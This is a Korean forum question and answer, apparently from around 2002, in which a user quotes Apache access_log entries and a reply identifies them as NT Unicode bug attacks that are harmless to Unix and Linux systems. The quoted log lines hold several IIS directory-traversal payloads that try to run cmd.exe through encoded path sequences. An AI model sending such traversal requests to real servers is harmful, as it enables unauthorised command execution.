꼭좀 봐주세요
작성자 정보
- saricat 작성
- 작성일
컨텐츠 정보
- 1,992 조회
- 0 추천
- 목록
본문
access_log에 담겨져 있는 로그들은
nt 기반의 unicode 버그 공격들이므로
unix, linux 기반의 system과는 무관한 공격입니다.
로그가 남아서 보기에 않좋지만 무시하셔도 상관없습니다.
로그를 않남기게 설정하시려면
kltp.kldp.org에서 검색하시면 자세한 내용이 나올것입니다.
준이 님의 글
access_log에 보니까
211.160.58.30 - - [31/Mar/2002:00:07:12 +0500] "GET /scripts/..%c0%2f../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 298
211.160.58.30 - - [31/Mar/2002:00:07:13 +0500] "GET /scripts/..%c0%af../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 298
211.160.58.30 - - [31/Mar/2002:00:07:14 +0500] "GET /scripts/..%c1%9c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 298
211.160.58.30 - - [31/Mar/2002:00:07:15 +0500] "GET /scripts/..%%35%63../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 400 282
211.160.58.30 - - [31/Mar/2002:00:07:16 +0500] "GET /scripts/..%%35c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 400 282
211.160.58.30 - - [31/Mar/2002:00:07:16 +0500] "GET /scripts/..%25%35%63../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
211.160.58.30 - - [31/Mar/2002:00:07:20 +0500] "GET /scripts/..%252f../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 299
이런식으로 계속 나오는데요. 이건 해킹을 시도 하는건가요?
관련자료
-
이전
-
다음
